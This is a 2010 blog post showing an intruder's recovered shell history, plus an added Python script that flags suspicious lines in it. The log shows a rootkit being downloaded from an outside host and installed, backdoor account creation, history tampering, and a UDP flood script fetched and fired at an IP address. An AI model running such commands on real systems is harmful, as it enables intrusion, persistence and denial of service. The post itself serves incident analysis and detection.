Thursday, 27 May 2010

Cracker footsteps

Kevin dug up the cracker's history file. Unix people will recognize this as an exact record of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.

cd /dev
history
wget http://www.cascorosso.com/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
w
ls
exit
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
exit
id
wget perl udp.pl 200.103.191.2 29 2000
wget www.packetstormsecurity.org/DoS/udp.pl
perl udp.pl 200.103.191.2 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
ls
cd vhosts/
ls
pwd
less kaotic.pl
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages

Notice that kaotic.pl file: it must have been there before this login, so the cracker must have deposited it some other way. By the time we got to kaotic.pl it was full of the same garbage that all the other files had in them.
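As an added illustration, not part of the original post, here is a small Python triage script of the kind a responder would run over a recovered shell history like the one above. The sample input is a constructed subset of the commands shown on this page; the rule names, the regular expressions and the scoring are my own assumptions, not anything the post describes.

```python
import re

# Constructed sample: a subset of the recovered history shown above, one
# command per line, as a triage tool would read it from ~/.bash_history.
SAMPLE_HISTORY = """\
cd /dev
history
wget http://www.cascorosso.com/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r
vi /etc/passwd
/usr/sbin/userdel fire
ps xw
exit
/usr/sbin/adduser crond -d /dev/crond
passwd crond
wget www.packetstormsecurity.org/DoS/udp.pl
perl udp.pl 200.103.191.2 29 2000
/usr/sbin/lsof | grep r0nin
less kaotic.pl
"""

# Hypothetical indicator rules (name, regex). Each one corresponds to a
# behaviour visible in the history above; the set is an assumption.
RULES = [
    ("remote download", re.compile(r"^(wget|curl|ftp|lynx)\b")),
    ("cd into /dev (attacker stash)", re.compile(r"^cd\s+/dev\b")),
    ("home directory under /dev", re.compile(r"\badduser\b.*-d\s+/dev/")),
    ("user deletion", re.compile(r"\buserdel\b")),
    ("password change", re.compile(r"^passwd\s+\S+")),
    ("history rewrite", re.compile(r"^history\s+-[rc]")),
    ("edit of /etc/passwd", re.compile(r"^(vi|vim|nano|ed)\s+/etc/passwd")),
    ("unpack and run installer", re.compile(r"^\./setup\b")),
    ("script with IP and port args",
     re.compile(r"^perl\s+\S+\.pl\s+\d{1,3}(\.\d{1,3}){3}\s+\d+")),
]


def triage_history(text):
    """Return [(line_no, command, [rule names])] for every line that fires a rule."""
    findings = []
    for n, raw in enumerate(text.splitlines(), start=1):
        cmd = raw.strip()
        if not cmd:
            continue
        hits = [name for name, rx in RULES if rx.search(cmd)]
        if hits:
            findings.append((n, cmd, hits))
    return findings


def downloaded_hosts(text):
    """Hostnames pulled from wget/curl lines: the first indicators to block and hunt for."""
    hosts = set()
    for cmd in text.splitlines():
        m = re.match(r"^(?:wget|curl)\s+(?:https?://)?([A-Za-z0-9.-]+)/", cmd.strip())
        if m:
            hosts.add(m.group(1).lower())
    return sorted(hosts)


def severity(findings):
    """Crude score: number of distinct rule names that fired across the history."""
    names = {h for _, _, hits in findings for h in hits}
    return len(names)


if __name__ == "__main__":
    hits = triage_history(SAMPLE_HISTORY)
    for n, cmd, names in hits:
        print(f"{n:3d}  {cmd:<50} {', '.join(names)}")
    print("hosts to block/hunt:", downloaded_hosts(SAMPLE_HISTORY))
    print("distinct indicators:", severity(hits))
```

On the sample above every rule fires at least once, which is the point of keeping a history file like this around: account changes, a home directory placed under /dev, a download-unpack-run sequence and a rewritten history each stand out on their own, and together they leave little doubt about what happened.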
